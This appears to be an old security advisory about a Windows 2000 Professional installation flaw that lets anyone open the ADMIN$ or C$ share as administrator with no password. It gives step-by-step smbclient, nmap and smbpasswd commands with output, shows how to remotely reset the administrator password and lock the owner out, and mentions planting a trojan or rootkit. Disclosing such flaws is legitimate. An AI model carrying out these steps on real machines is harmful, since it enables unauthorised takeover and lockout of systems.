COMMAND
install procedure
SYSTEMS AFFECTED
Win2000
PROBLEM
Stephane Aubert found following. During the installation process
of Windows 2000 professionnal anyone can connect to the ADMIN$
share as ADMINISTRATOR whithout any password. Verification:
% ./smbclient \\\\WINDOZE\\ADMIN$ -I xxx.yyy.zzz.ttt -U 'administrator' -d 0 -N
Unable to open configuration file "/usr/local/samba/lib/smb.conf"!
pm_process retuned false
Can't load /usr/local/samba/lib/smb.conf - run testparm to debug it
Domain=[GROAR] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]
smb: \>
As a lot of people asked for information on the unsecure win2k pro
installation process, here are further information on this
vulnerability. All these tests have been made and checked with
Denis Ducamp and Alain Thivillon, 2 serious security experts.
What the have done:
1. Install the final release of win2k pro (build 2195)
2. Do not give any IP address during the install. If no DHCP
server is responding the win2k pro box take 169.254.153.13 as
IP address. (The address range used is 169.254.0.0/16, which
is registered with the IANA as the LINKLOCAL net.)
Notice: if a real IP address is given by the admin or a DCHP
server you can connect directely, and jump to step 4 right now.
3. On your favorit Linux (or *BSD) box add an alias to the
interface: # ifconfig eth0:0 169.254.153.11
4. Just after the configuration of COM+ by win2k you can ping or
scan it:
% nmap 169.254.153.13
Starting nmap V. 2.3BETA10 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on (169.254.153.13):
Port State Protocol Service
139 open tcp netbios-ssn
# nmap -sU -p 1-200 169.254.153.13
Starting nmap V. 2.3BETA10 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on (169.254.153.13):
Port State Protocol Service
137 open udp netbios-ns
138 open udp netbios-dgm
Notice: the administrtor have already entered a password !!!
5. By now, you can connect via SMB (smbclient for example) to the
C$ or ADMIN$ share WITHOUT ANY PASSWORD !!! This until win2k
asked the admin to reboot the computer. Notice: it's possible
to use NAT (netbios auditing tool) to obtain the netbios name
of the windows box and the shares.
% ./smbclient //groar/c$ -I 169.254.153.13 -U administrator
added interface ip=169.254.153.12 bcast=169.254.153.31 nmask=255.255.255.224
Password: <EMPTY>
Domain=[WORKGROUP] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]
smb: \> ls
IO.SYS HSR 40992 Tue May 31 06:22:00 1994
MSDOS.SYS HSR 38166 Tue May 31 06:22:00 1994
COMMAND.COM R 56286 Tue May 31 06:22:00 1994
WINA20.386 A 9349 Tue May 31 06:22:00 1994
CONFIG.SYS A 638 Fri Feb 18 15:34:00 2000
AUTOEXEC.BAT A 690 Fri Feb 18 15:33:10 2000
6. Worse !
You can SET (remotly) a new administrator password:
% ./smbpasswd -U administrator -r groar
Old SMB password: <EMPTY>
New SMB password: <NEWPASS>
Retype new SMB password: <NEWPASS>
startsmbfilepwent: unable to open file /usr/local/samba/private/smbpasswd
unable to open smb password database.
Password changed for user administrator.
By now, nobody - even the administrator - even after the reboot
- can connect (remote nor local) without the NEW password. The
administrator have to crack his own computer.
7. Worse
It is also (evidence) possible to transfert a trojan on the new
computer or just a rootkit (www.rootkit.com) in order to keep
administrator privileges for a long time.
SOLUTION
Nothing yet. Do install without network connection.